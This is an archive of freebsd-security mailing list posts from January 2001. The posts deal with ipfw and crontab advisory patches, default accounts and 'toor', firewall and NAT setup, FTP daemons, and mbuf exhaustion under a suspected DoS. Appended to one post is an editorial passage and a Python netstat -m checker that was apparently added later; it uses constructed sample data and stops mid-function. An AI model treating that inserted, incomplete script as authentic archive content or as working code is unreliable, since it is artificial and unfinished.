X-Mailer: VM 6.72 under 21.1 (patch 8) "Bryce Canyon" XEmacs Lucid

From owner-freebsd-security Tue Jan 23 19:17:27 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mc-qout4.whowhere.com (mc-qout4.whowhere.com [209.185.123.18]) by hub.freebsd.org (Postfix) with SMTP id 1263037B6A2 for ; Tue, 23 Jan 2001 19:17:11 -0800 (PST)
Received: from Unknown/Local ([?.?.?.?]) by hotbot.com; Tue Jan 23 19:17:00 2001
To: kris@FreeBSD.ORG
Date: Tue, 23 Jan 2001 19:17:00 -0800
From: "bob Dobolina"
Message-ID:
Mime-Version: 1.0
Cc: freebsd-security@FreeBSD.ORG
X-Sent-Mail: off
Reply-To: devolve@hotbot.com
X-Mailer: MailCity Service
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:08.ipfw
X-Sender-Ip: 207.5.63.61
Organization: HotBot Mail (http://mail.hotbot.mailcity.lycos.com:80)
Content-Type: text/plain; charset=us-ascii
Content-Language: en
Content-Length: 702
Content-Transfer-Encoding: 7bit

Hmm, well it looks like the date of ipfw-4.x.patch.asc is in the year
2000, while ipfw-4.x.patch is in the year 2001. This is starting to get
a bit unsettling.

>> The patch files shown above are correct ?
>> pgp show bad signature as follows.
>
> Oops, not sure what went wrong then (the bad signature was in fact the
> one I uploaded, but it must have been against an older version of the
> diff). I have uploaded the correct signature now.
>
> It's good to see people are actually checking this!

ishizuka@ish.org

HotBot - Search smarter.
http://www.hotbot.com

From owner-freebsd-security Tue Jan 23 19:56:00 2001
Delivered-To: freebsd-security@freebsd.org
Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 8758737B401 for ; Tue, 23 Jan 2001 19:55:42 -0800 (PST)
Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0O3xDY25410; Tue, 23 Jan 2001 19:59:13 -0800 (PST) (envelope-from kris)
Date: Tue, 23 Jan 2001 19:59:13 -0800
From: Kris Kennaway
To: bob Dobolina
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:08.ipfw
Message-ID: <20010123195913.B24502@citusc17.usc.edu>
References:
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="s/l3CgOIzMHHjg/5"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from devolve@hotbot.com on Tue, Jan 23, 2001 at 07:17:00PM -0800

On Tue, Jan 23, 2001 at 07:17:00PM -0800, bob Dobolina wrote:
> Hmm, well it looks like the date of ipfw-4.x.patch.asc is in the
> year 2000, while ipfw-4.x.patch is in the year 2001. This is
> starting to get a bit unsettling.

eh?

Kris

--
NOTE: To fetch an updated copy of my GPG key which has not expired,
finger kris@FreeBSD.org

From owner-freebsd-security Tue Jan 23 20:01:34 2001
Delivered-To: freebsd-security@freebsd.org
Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 418AE37B404 for ; Tue, 23 Jan 2001 20:01:17 -0800 (PST)
Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0O44lG25560; Tue, 23 Jan 2001 20:04:47 -0800 (PST) (envelope-from kris)
Date: Tue, 23 Jan 2001 20:04:47 -0800
From: Kris Kennaway
To: Todd Backman
Cc: security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:08.ipfw
Message-ID: <20010123200447.B25436@citusc17.usc.edu>
References: <20010123210823.349E837B402@hub.freebsd.org>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="jq0ap7NbKX2Kqbes"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from todd@flyingcroc.net on Tue, Jan 23, 2001 at 06:47:08PM -0800

On Tue, Jan 23, 2001 at 06:47:08PM -0800, Todd Backman wrote:
>
> Anyone else failing here?:
>
> Patching file sys/netinet/ip_fw.c using Plan A...
> Hunk #1 succeeded at 244.
> Hunk #2 failed at 1214.

We don't support 4.0 for security advisories. The patch applies to
4.2-RELEASE, but I didn't test earlier releases. This should probably
have been more explicit in the advisory. If you ask nicely, someone
may generate you an unofficial patch against 4.0; otherwise you'll have
to upgrade or do it yourself.
Kris

--
NOTE: To fetch an updated copy of my GPG key which has not expired,
finger kris@FreeBSD.org

From owner-freebsd-security Tue Jan 23 21:22:33 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ducky.nz.freebsd.org (ns1.unixathome.org [203.79.82.27]) by hub.freebsd.org (Postfix) with ESMTP id 111BB37B400 for ; Tue, 23 Jan 2001 21:22:15 -0800 (PST)
Received: from xeon (xeon.unixathome.org [192.168.0.18]) by ducky.nz.freebsd.org (8.9.3/8.9.3) with SMTP id SAA09697 for ; Wed, 24 Jan 2001 18:22:13 +1300 (NZDT)
Message-Id: <200101240522.SAA09697@ducky.nz.freebsd.org>
To: security@freebsd.org
From: Dan Langille
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:09.crontab
Date: Wed, 24 Jan 2001 05:22:13 GMT
X-Mailer: Endymion MailMan Professional Edition v3.0.29

> # cd /usr/src/usr.sbin/cron/crontab
> # patch -p < /path/to/patch
> # make depend && make all install

Ummm, is this to be expected?

[root@ducky:/usr/src/usr.sbin/cron/crontab] # make depend && make all install
rm -f .depend
mkdep -f .depend -a -I/usr/src/usr.sbin/cron/crontab/../cron crontab.c
cd /usr/src/usr.sbin/cron/crontab; make _EXTRADEPEND
echo crontab: /usr/lib/libc.a /usr/src/usr.sbin/cron/crontab/../lib/libcron.a /usr/lib/libutil.a >> .depend
Warning: Object directory not changed from original /usr/src/usr.sbin/cron/crontab
cc -O -pipe -I/usr/src/usr.sbin/cron/crontab/../cron -c crontab.c
cc -O -pipe -I/usr/src/usr.sbin/cron/crontab/../cron -o crontab crontab.o /usr/src/usr.sbin/cron/crontab/../lib/libcron.a -lutil
cc: /usr/src/usr.sbin/cron/crontab/../lib/libcron.a: No such file or directory
*** Error code 1

---------------------------------------------
This message was sent using Endymion MailMan.
http://www.endymion.com/products/mailman/

From owner-freebsd-security Tue Jan 23 21:48:24 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ducky.nz.freebsd.org (ns1.unixathome.org [203.79.82.27]) by hub.freebsd.org (Postfix) with ESMTP id B3D3837B400 for ; Tue, 23 Jan 2001 21:48:05 -0800 (PST)
Received: from xeon (xeon.unixathome.org [192.168.0.18]) by ducky.nz.freebsd.org (8.9.3/8.9.3) with SMTP id SAA09961; Wed, 24 Jan 2001 18:47:58 +1300 (NZDT)
Message-Id: <200101240547.SAA09961@ducky.nz.freebsd.org>
To: Anil Jangity
Cc: freebsd-security@freebsd.org
From: Dan Langille
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:09.crontab
Date: Wed, 24 Jan 2001 05:47:58 GMT
X-Mailer: Endymion MailMan Professional Edition v3.0.29

That did it. Thanks.

> Go up one level (/usr/src/usr.sbin/cron) and then re-run make.
>
> Dan Langille wrote:
> >
> > > # cd /usr/src/usr.sbin/cron/crontab
> > > # patch -p < /path/to/patch
> > > # make depend && make all install
> >
> > Ummm, is this to be expected?
> >
> > [root@ducky:/usr/src/usr.sbin/cron/crontab] # make depend && make all install
> > rm -f .depend
> > mkdep -f .depend -a -I/usr/src/usr.sbin/cron/crontab/../cron crontab.c
> > cd /usr/src/usr.sbin/cron/crontab; make _EXTRADEPEND
> > echo crontab: /usr/lib/libc.a /usr/src/usr.sbin/cron/crontab/../lib/libcron.a
> > /usr/lib/libutil.a >> .depend
> > Warning: Object directory not changed from original
> > /usr/src/usr.sbin/cron/crontab
> > cc -O -pipe -I/usr/src/usr.sbin/cron/crontab/../cron -c crontab.c
> > cc -O -pipe -I/usr/src/usr.sbin/cron/crontab/../cron -o crontab crontab.o
> > /usr/src/usr.sbin/cron/crontab/../lib/libcron.a -lutil
> > cc: /usr/src/usr.sbin/cron/crontab/../lib/libcron.a: No such file or directory
> > *** Error code 1
> >
> > ---------------------------------------------
> > This message was sent using Endymion MailMan.
> > http://www.endymion.com/products/mailman/
>

--
Dan Langille - novice in training

---------------------------------------------
This message was sent using Endymion MailMan.
http://www.endymion.com/products/mailman/

From owner-freebsd-security Tue Jan 23 23:07:15 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.interactivate.com (unknown [63.141.73.15]) by hub.freebsd.org (Postfix) with ESMTP id 463AB37B69F; Tue, 23 Jan 2001 23:06:48 -0800 (PST)
Received: from interactivate.com (snakcx408168-b.@cx408168-b.escnd1.sdca.home.com [24.20.227.61]) by mail.interactivate.com (8.11.1/8.11.1) with ESMTP id f0O7T5V61581; Tue, 23 Jan 2001 23:29:05 -0800 (PST) (envelope-from larry@interactivate.com)
Message-ID: <3A6E7F77.6DFC4A3E@interactivate.com>
Date: Tue, 23 Jan 2001 23:08:39 -0800
From: Lawrence Sica
Organization: Interactivate, Inc.
X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Guillermo Leandro
Cc: freebsd-security@FreeBSD.ORG, freebsd-hackers@FreeBSD.ORG
Subject: Re: Default users and the passwords
References: <01012315244000.00612@aristoteles.local.galileo.or.cr>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Guillermo Leandro wrote:
> Hi everybody!
>
> FreeBSD, like almost all Unix OS, has other default users, like uucp,
> operator, etc. Since these users come with the FreeBSD distribution, where
> can I find their passwords?
>

They don't have any; the pseudo users and system accounts don't have a
login shell, and their passwords should be set to * as well. Be careful
if you remove them, since on a make world certain users are expected,
same with groups.

>
> Another thing, why is there another uid 0 called toor? Isn't it a potential
> security hole?
>

toor is a big debate for many; it's meant to give you another root shell
with a differing shell, like bash, zsh, ksh, whatever. The reason is you
don't want to mess with root's shell. Someone compared root to a loaded
weapon recently; it's a good analogy, since you don't use root unless you
mean it and you have to be careful.
--Larry

From owner-freebsd-security Wed Jan 24 05:07:19 2001
Delivered-To: freebsd-security@freebsd.org
Received: from tomts5-srv.bellnexxia.net (tomts5.bellnexxia.net [209.226.175.25]) by hub.freebsd.org (Postfix) with ESMTP id 71E5637B698; Wed, 24 Jan 2001 05:06:54 -0800 (PST)
Received: from johnny2k ([64.229.35.40]) by tomts5-srv.bellnexxia.net (InterMail vM.4.01.03.00 201-229-121) with SMTP id <20010124130653.ITSH27935.tomts5-srv.bellnexxia.net@johnny2k>; Wed, 24 Jan 2001 08:06:53 -0500
Message-ID: <000a01c08606$9041efe0$2823e540@johnny2k>
From: "John Telford"
To: ,
Subject: IPFW modify the "simple" rule set 4.2 to allow ...
Date: Wed, 24 Jan 2001 08:07:11 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="----=_NextPart_000_0007_01C085DC.A7368000"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
X-Mimeole: Produced By Microsoft MimeOLE V5.00.2919.6700

I'd like to get the settings in the right place so I'm asking the experts.
FreeBSD 4.2 release with firewall type set to "simple".
It works but I'd like to allow 2 things through.
SSH connections from the public side to the firewall.
Connections to a Web server on the inside.

Thanks in advance.
John.

From owner-freebsd-security Wed Jan 24 05:24:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from supermall.dk (mail.absolute-promotion.dk [195.41.95.9]) by hub.freebsd.org (Postfix) with SMTP id 0358437B400 for ; Wed, 24 Jan 2001 05:24:01 -0800 (PST)
Received: (qmail 20459 invoked from network); 24 Jan 2001 13:14:12 -0000
Received: from unknown (HELO incorp.dk) (195.41.95.19) by mail.absolute-promotion.dk with SMTP; 24 Jan 2001 13:14:12 -0000
Message-ID: <3A6EE52B.B37F65EB@incorp.dk>
Date: Wed, 24 Jan 2001 14:22:35 +0000
From: Dennis Rand
X-Mailer: Mozilla 4.76 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: IPNAT
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hi there

I'm trying to set up a network with internal IPs like 192.168.0.*, but I
have this problem: I also have 2 webservers running on the inside with
two external IPs attached to them. It would be great if I could get them
translated from internal IPs to external IPs and the other way around, so
that if someone wanted to contact the webservers, the FreeBSD machine
would translate the external IP to the specific internal machine.

So I've made an rc.nat, and now I just need to know how to set this file
up so I can get it to work properly with

ipnat -D -f /etc/rc.nat

--
Med Venlig Hilsen / Best regards
__________________________
Dennis Rand
inCorp A/S - Odense
Middelfartvej 9-11
5000 Odense C
Tlf.: 70 22 55 30
Fax.: 63 12 55 39
Email: dr@incorp.dk
http://www.inCorp.dk

From owner-freebsd-security Wed Jan 24 06:33:25 2001
Delivered-To: freebsd-security@freebsd.org
Received: from neo.spbnit.ru (mail.spbnit.ru [212.48.192.115]) by hub.freebsd.org (Postfix) with ESMTP id 853AA37B6A2 for ; Wed, 24 Jan 2001 06:33:06 -0800 (PST)
Received: from localhost.localdomain (ppp-200.pool-121.spbnit.ru [212.48.199.200]) by neo.spbnit.ru (8.9.3+mPOP/8.9.3) with SMTP id RAA37500 for ; Wed, 24 Jan 2001 17:33:01 +0300 (MSK)
From: "Mr. Blackman"
Reply-To: blackman@blackman.ru
To: freebsd-security@freebsd.org
Subject: DoS: socket: No buffer space available
Date: Wed, 24 Jan 2001 17:32:52 +0300
X-Mailer: KMail [version 1.0.29]
Content-Type: text/plain
MIME-Version: 1.0
Message-Id: <01012417332701.31962@localhost.localdomain>
Content-Transfer-Encoding: 8bit

Hello!

In the last few days our server was DoSed (I'm sure).
OK, facts:

The Problem:
IP socket: No buffer space available
UNIX Socket : No buffer space available

Victim: FreeBSD 3.4
Kernel compiled with these options:
options ICMP_BANDLIM
options TCP_DROP_SYNFIN
options TCP_RESTRICT_RST
options IPFIREWALL
options IPFIREWALL_VERBOSE
options IPFIREWALL_VERBOSE_LIMIT=10

/etc/rc.conf:
tcp_drop_synfin="YES"
tcp_restrict_rst="YES"
icmp_drop_redirect="YES"
icmp_log_redirect="YES"
firewall_enable="YES"
firewall_script="/etc/rc.firewall"
firewall_type="/etc/rc.firewall"
firewall_quiet="NO"

### TCP STACK TUNING ###
# TCP send/receive spaces
sysctl -w net.inet.tcp.sendspace=32768
sysctl -w net.inet.tcp.recvspace=32768
# Socket queue defense against SYN attacks
sysctl -w kern.ipc.somaxconn=1024 #!!!
sysctl -w net.inet.icmp.drop_redirect=1
sysctl -w net.inet.icmp.log_redirect=1
sysctl -w net.inet.ip.redirect=0
sysctl -w net.inet6.ip6.redirect=0
sysctl -w net.link.ether.inet.max_age=1200
sysctl -w net.inet.ip.sourceroute=0
sysctl -w net.inet.ip.accept_sourceroute=0
sysctl -w net.inet.icmp.bmcastecho=0
sysctl -w net.inet.icmp.maskrepl=0
### END TCP STACK TUNING ###

On this server all packets are filtered with IPFW and _all_, except 53 udp,
are in "deny".

Yes, I know about "named DoS", but the server is completely down.
And only a reboot solves the problem.

Where is the problem, where is salvation? :)

Thank you for your attention.

Mr. Blackman, Security Officer.
From owner-freebsd-security Wed Jan 24 07:18:38 2001
Delivered-To: freebsd-security@freebsd.org
Received: from liberty.bulinfo.net (liberty.bulinfo.net [212.72.195.7]) by hub.freebsd.org (Postfix) with SMTP id 3CE3D37B400 for ; Wed, 24 Jan 2001 07:18:18 -0800 (PST)
Received: (qmail 58371 invoked from network); 24 Jan 2001 15:18:09 -0000
Received: from pythia.bulinfo.net (HELO bulinfo.net) (212.72.195.5) by liberty.bulinfo.net with SMTP; 24 Jan 2001 15:18:09 -0000
Message-ID: <3A6EF228.60C10497@bulinfo.net>
Date: Wed, 24 Jan 2001 17:18:00 +0200
From: Krassimir Slavchev
X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.13 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: Re: DoS: socket: No buffer space available
References: <01012417332701.31962@localhost.localdomain>
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit

Hi,

Can you provide the output of netstat -m?

"Mr. Blackman" wrote:
> Hello!
>
> In the last few days our server was DoSed (I'm sure).
> OK, facts:
> The Problem:
> IP socket: No buffer space available
> UNIX Socket : No buffer space available
>
> Victim: FreeBSD 3.4
> Kernel compiled with these options:
> options ICMP_BANDLIM
> options TCP_DROP_SYNFIN
> options TCP_RESTRICT_RST
> options IPFIREWALL
> options IPFIREWALL_VERBOSE
> options IPFIREWALL_VERBOSE_LIMIT=10
>
> /etc/rc.conf:
> tcp_drop_synfin="YES"
> tcp_restrict_rst="YES"
> icmp_drop_redirect="YES"
> icmp_log_redirect="YES"
> firewall_enable="YES"
> firewall_script="/etc/rc.firewall"
> firewall_type="/etc/rc.firewall"
> firewall_quiet="NO"
>
> ### TCP STACK TUNING ###
> # TCP send/receive spaces
> sysctl -w net.inet.tcp.sendspace=32768
> sysctl -w net.inet.tcp.recvspace=32768
> # Socket queue defense against SYN attacks
> sysctl -w kern.ipc.somaxconn=1024 #!!!
> sysctl -w net.inet.icmp.drop_redirect=1
> sysctl -w net.inet.icmp.log_redirect=1
> sysctl -w net.inet.ip.redirect=0
> sysctl -w net.inet6.ip6.redirect=0
> sysctl -w net.link.ether.inet.max_age=1200
> sysctl -w net.inet.ip.sourceroute=0
> sysctl -w net.inet.ip.accept_sourceroute=0
> sysctl -w net.inet.icmp.bmcastecho=0
> sysctl -w net.inet.icmp.maskrepl=0
> ### END TCP STACK TUNING ###
>
> On this server all packets are filtered with IPFW and _all_, except 53 udp, are
> in "deny".
>
> Yes, I know about "named DoS", but the server is completely down.
> And only a reboot solves the problem.
>
> Where is the problem, where is salvation? :)
>
> Thank you for your attention.
>
> Mr. Blackman, Security Officer.

From owner-freebsd-security Wed Jan 24 07:18:48 2001
Delivered-To: freebsd-security@freebsd.org
Received: from neo.spbnit.ru (mail.spbnit.ru [212.48.192.115]) by hub.freebsd.org (Postfix) with ESMTP id 555D037B698 for ; Wed, 24 Jan 2001 07:18:24 -0800 (PST)
Received: from localhost.localdomain (ppp-195.pool-113.spbnit.ru [212.48.192.195]) by neo.spbnit.ru (8.9.3+mPOP/8.9.3) with SMTP id SAA39725; Wed, 24 Jan 2001 18:18:17 +0300 (MSK)
From: "Mr. Blackman"
Reply-To: blackman@blackman.ru
To: "Sean O'Connell"
Subject: Re: DoS: socket: No buffer space available
Date: Wed, 24 Jan 2001 18:07:57 +0300
X-Mailer: KMail [version 1.0.29]
Content-Type: text/plain
References: <01012417332701.31962@localhost.localdomain> <20010124093824.C64654@stat.Duke.EDU>
In-Reply-To: <20010124093824.C64654@stat.Duke.EDU>
Cc: freebsd-security@freebsd.org
MIME-Version: 1.0
Message-Id: <01012418184202.31962@localhost.localdomain>
Content-Transfer-Encoding: 8bit

options NMBCLUSTERS=32768
options NSFBUFS=32768

...always; this is the first thing that I do on new servers.

netstat -m: 30% used or so...

I would like to know all possible reasons for "socket: no buffer space
available" (for example: $sudo bash: socket: no buffer space available).

> I would guess MBUF exhaustion as the cause. Look at
>
> netstat -m
>
> /sys/i386/conf/LINT has some tuning examples. I think this works
> under RELENG_3
>
> options NMBCLUSTERS=8192
>
> (or bigger). You can also up the # of maxusers to 128 or something
> as this will resize most of the kernel tables. I fear a reboot may
> be the only short term fix.
>
> S
> --
> Sean O'Connell                                  Email: sean@stat.Duke.EDU
> Institute of Statistics and Decision Sciences   Phone: (919) 684-5419
> Duke University                                 Fax:   (919) 684-8594

From owner-freebsd-security Wed Jan 24 07:45:25 2001
Delivered-To: freebsd-security@freebsd.org
Received: from hex.databits.net (hex.databits.net [207.29.192.16]) by hub.freebsd.org (Postfix) with SMTP id 6976637B404 for ; Wed, 24 Jan 2001 07:45:07 -0800 (PST)
Received: (qmail 5151 invoked by uid 1001); 24 Jan 2001 15:46:31 -0000
Date: Wed, 24 Jan 2001 10:46:31 -0500
From: Pete Fritchman
To: John Telford
Cc: freebsd-security@freebsd.org
Subject: Re: IPFW modify the "simple" rule set 4.2 to allow ...

[ freebsd-net removed ]

++ 24/01/01 08:07 -0500 - John Telford:
> I'd like to get the settings in the right place so I'm asking the experts.
> Freebsd 4.2 release with firewall type set to "simple".
> It works but I'd like to allow 2 things through.
> SSH connections from the public side to the firewall.

You'll need to modify /etc/rc.firewall. Look through until you see something like:

    [Ss][Ii][Mm][Pp][Ll][Ee])
        ############
        # This is a prototype setup for a simple firewall. Configure this
        # machine as a named server and ntp server, and point all the machines
        # on the inside at this machine for those services.
        ############

Scroll down and before the command that says "Reject&Log all setup of incoming connections ...", add:

    # Allow access to SSH
    ${fwcmd} add pass tcp from any to ${oip} 22 setup

> Connections to a Web server on the inside.

I'm not quite sure what you mean - do you have a webserver on another port? WWW is already allowed through in the simple firewall type.

> Thanks in advance. John.

-pete

--
Pete Fritchman
Databits Network Services, Inc.
From owner-freebsd-security Wed Jan 24 7:49:10 2001
Date: Wed, 24 Jan 2001 10:50:15 -0500
From: Pete Fritchman
To: Dennis Rand
Cc: freebsd-security@freebsd.org
Subject: Re: IPNAT

In the future, this probably isn't appropriate for -security. Try -questions.

You're probably interested in the "rdr" keyword for ipnat. You can find a great howto at:

http://www.obfuscation.org/ipf/

-pete.

++ 24/01/01 14:22 +0000 - Dennis Rand:
> Hi there
>
> I'm trying to setup a network with internal ip's like 192.168.0.* but I
> have this problem that I also have 2 webservers
> running on the inside with two external IPs attached to them, then it would
> be great if I could get them translated from internal IPs to external
> IPs and the other way around, so if someone wanted to contact the
> webservers the FreeBSD machine would translate the external IP to the
> specific internal machine.
>
> So I've made a rc.nat and now I just need to know how to set this file
> up so I can get it to work properly
> with ipnat -D -f /etc/rc.nat
>
> --
> Med Venlig Hilsen / Best regards
> __________________________
>
> Dennis Rand
> inCorp A/S - Odense
> Middelfartvej 9-11
> 5000 Odense C
>
> Tlf.: 70 22 55 30
> Fax.: 63 12 55 39
> Email: dr@incorp.dk
> http://www.inCorp.dk

--
Pete Fritchman
Databits Network Services, Inc.
From owner-freebsd-security Wed Jan 24 9:29:19 2001
Date: Wed, 24 Jan 2001 12:37:57 -0500
From: Vlad
To: Artem Koutchine
Cc: freebsd-security@freebsd.org
Subject: Re: Which is the most secure and reliable ftp daemon

On Wed, Jan 24, 2001 at 08:19:06PM +0300, Artem Koutchine (matrix@ipform.ru) wrote:
> Hello!
>
> I just audited my system for security and it came up that I am
> running inetd ONLY because ftp daemon is needed.
>
> I know that there are many good ftp daemons, but since
> I never tested any of them in a real production environment
> I don't know which to pick.
>
> Please, share your experience with different ftp daemons.
> I need something very reliable, secure and configurable.
> Currently I am thinking about wu-ftpd and proftpd, but both
> of them have a history of security flaws.
>
> If I find one, I could finally turn off inetd and save myself some
> RAM and maybe even tighten security.
>
> Regards,
> Artem

It is impossible to state that a certain daemon is the most secure one - all depends on the way you configure it and the level of security of your whole system. Personally, I prefer PROFTPD (as most people do) over other alternatives, particularly because of its flexible configuration. If you are planning to run anonymous ftp, then proftpd is definitely your choice. If not, you might consider FBSD's ftpd, which is rather good (if you chroot users in their directories/etc).

Hope that helps.
--
tmd

From owner-freebsd-security Wed Jan 24 11:12:51 2001
Date: Wed, 24 Jan 2001 11:12:24 -0800 (PST)
From: Matt Chew Spence
To: Lawrence Sica
Cc: Guillermo Leandro
Subject: Re: Default users and the passwords

Another question in a similar vein:

Which, if any (besides root and nobody, which are a given), of these default accounts are critical to the basic functionality of the box? Is there a list somewhere where I can match these phantom/daemon users to their functionality/dependencies? I'd just as soon blow away things I'll never use (uucp, xten, etc), but I am loath to do so without a better understanding of the ramifications thereof....

Any information would be greatly appreciated,

Matt

On Tue, 23 Jan 2001, Lawrence Sica wrote:

> Guillermo Leandro wrote:
>
> > Hi everybody!
> >
> > FreeBSD, like almost all Unix OS, has other default users, like uucp,
> > operator, etc. Since these users come with the FreeBSD distribution, where
> > can I find their passwords?
>
> They don't have any; the pseudo users and system accounts don't have a login
> shell and their passwords should be set to * as well. Be careful if you
> remove them since on a make world certain users are expected, same with
> groups.
>
> > Another thing, why is there another uid 0 called toor? Isn't it a potential
> > security hole?
>
> toor is a big debate for many; it's meant to give you another root shell with
> a differing shell, like bash, zsh, ksh, whatever. The reason is you don't want to mess
> with root's shell. Someone compared root to a loaded weapon recently; it's a
> good analogy since you don't use root unless you mean it and you have to be
> careful.
>
> --Larry

_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
Matt Chew Spence           Network Engineer/Systems Engineer
matt@nren.nasa.gov         NASA Research & Education Network
(650) 604-4550 (voice)     Ames Research Center Mail Stop 233-21
(650) 604-3080 (fax)       Moffett Field, CA 94035-1000
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/

From owner-freebsd-security Wed Jan 24 11:31:10 2001
From: "Jorge Filipe Andrade"
Subject: Re: socket: No buffer space available
Date: Wed, 24 Jan 2001 19:30:00 -0000
Organization: SONET - Serviços Internet, Lda

Hello.

I have this problem too, but it is in Squid Proxy Server... In cache.log and in Microsoft Internet Explorer 5:

2001/01/24 19:04:24| comm_open: socket failure: (55) No buffer space available
2001/01/24 19:04:24| comm_open: socket failure: (55) No buffer space available
...

and the squid proxy server is not working correctly.

I'm running the squid proxy server on a Dual PIII 500 MHz with 384 RAM, FreeBSD 4.1.1-RELEASE and two network boards; I have also installed a Cidera Inc. Cache (SkyCache).

Any questions?

--
Best Regards,

Jorge Filipe Andrade
SONET - Serviços Internet, Lda
http://www.sonet.pt

----- Original Message -----
From: "Mr. Blackman"
Sent: Wednesday, January 24, 2001 2:32 PM
Subject: DoS: socket: No buffer space available

> Hello!
>
> Last days our server was DoSed (I'm sure).
> Ok, facts:
> The Problem:
> IP socket: No buffer space available
> UNIX Socket : No buffer space available
>
> Victim: FreeBSD 3.4
> Kernel compiled with these options:
> options ICMP_BANDLIM
> options TCP_DROP_SYNFIN
> options TCP_RESTRICT_RST
> options IPFIREWALL
> options IPFIREWALL_VERBOSE
> options IPFIREWALL_VERBOSE_LIMIT=10
>
> /etc/rc.conf:
> tcp_drop_synfin="YES"
> tcp_restrict_rst="YES"
> icmp_drop_redirect="YES"
> icmp_log_redirect="YES"
> firewall_enable="YES"
> firewall_script="/etc/rc.firewall"
> firewall_type="/etc/rc.firewall"
> firewall_quiet="NO"
>
> ### TCP STACK TUNING ###
> # TCP send/receive spaces
> sysctl -w net.inet.tcp.sendspace=32768
> sysctl -w net.inet.tcp.recvspace=32768
> # Socket queue defense against SYN attacks
> sysctl -w kern.ipc.somaxconn=1024 #!!!
> sysctl -w net.inet.icmp.drop_redirect=1
> sysctl -w net.inet.icmp.log_redirect=1
> sysctl -w net.inet.ip.redirect=0
> sysctl -w net.inet6.ip6.redirect=0
> sysctl -w net.link.ether.inet.max_age=1200
> sysctl -w net.inet.ip.sourceroute=0
> sysctl -w net.inet.ip.accept_sourceroute=0
> sysctl -w net.inet.icmp.bmcastecho=0
> sysctl -w net.inet.icmp.maskrepl=0
> ### END TCP STACK TUNING ###
>
> On this server all packets are filtered with IPFW and _all_, except 53 udp, are
> in "deny".
>
> Yes, I know about "named DoS", but the server is completely down.
> And only a reboot solves the problem.
>
> Where is the problem, where is salvation? :)
>
> Thank you for attention.
>
> Mr. Blackman, Security Officer.
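Both reports in this thread (Mr. Blackman's server and Jorge's Squid box) come down to what Sean O'Connell pointed at: mbuf exhaustion, which is read off netstat -m. The script below is an added example for this archive, not code from the list or from FreeBSD. It parses a constructed netstat -m sample laid out like the FreeBSD 4.x output and flags the three things worth reading from it: current utilisation against the NMBCLUSTERS ceiling, whether the peak has ever hit the ceiling, and the denied-request counter (a denied allocation is what socket(2) reports as ENOBUFS, errno 55, the "(55) No buffer space available" in Jorge's cache.log). The sample numbers, the warn_pct threshold and the function names are assumptions of the example.

```python
import re
from typing import Dict, List

# Constructed sample in the layout of `netstat -m` on FreeBSD 4.x; it is not
# output captured from any host in the thread. The numbers depict a box whose
# mbuf cluster pool hit its NMBCLUSTERS ceiling during an attack and then
# drained again: current use looks harmless, peak and the denial counter do not.
SAMPLE_NETSTAT_M = """\
1206/32768/32768 mbufs in use (current/peak/max):
        1206 mbufs allocated to data
1180/32768/32768 mbuf clusters in use (current/peak/max)
69632 Kbytes allocated to network (100% of mb_map in use)
4127 requests for memory denied
0 requests for memory delayed
3 calls to protocol drain routines
"""

_TRIPLE = r"(\d+)/(\d+)/(\d+)"  # current/peak/max


def parse_netstat_m(text: str) -> Dict[str, int]:
    """Extract the mbuf and cluster counters (current/peak/max) and the
    allocation-failure counters from netstat -m output."""
    stats: Dict[str, int] = {}
    patterns = {
        "mbuf": re.compile(_TRIPLE + r" mbufs in use"),
        "clust": re.compile(_TRIPLE + r" mbuf clusters in use"),
    }
    for key, pat in patterns.items():
        m = pat.search(text)
        if m:
            stats[key + "_cur"], stats[key + "_peak"], stats[key + "_max"] = map(int, m.groups())
    for key, phrase in (("denied", "requests for memory denied"),
                        ("delayed", "requests for memory delayed"),
                        ("drains", "calls to protocol drain routines")):
        m = re.search(r"(\d+) " + phrase, text)
        if m:
            stats[key] = int(m.group(1))
    return stats


def assess(stats: Dict[str, int], warn_pct: int = 80) -> List[str]:
    """Return human-readable findings; an empty list means the pools look healthy."""
    findings: List[str] = []
    for key, label in (("mbuf", "mbufs"), ("clust", "mbuf clusters")):
        cur = stats.get(key + "_cur")
        peak = stats.get(key + "_peak")
        mx = stats.get(key + "_max")
        if cur is None or peak is None or not mx:
            continue
        cur_pct = 100 * cur // mx
        if cur_pct >= warn_pct:
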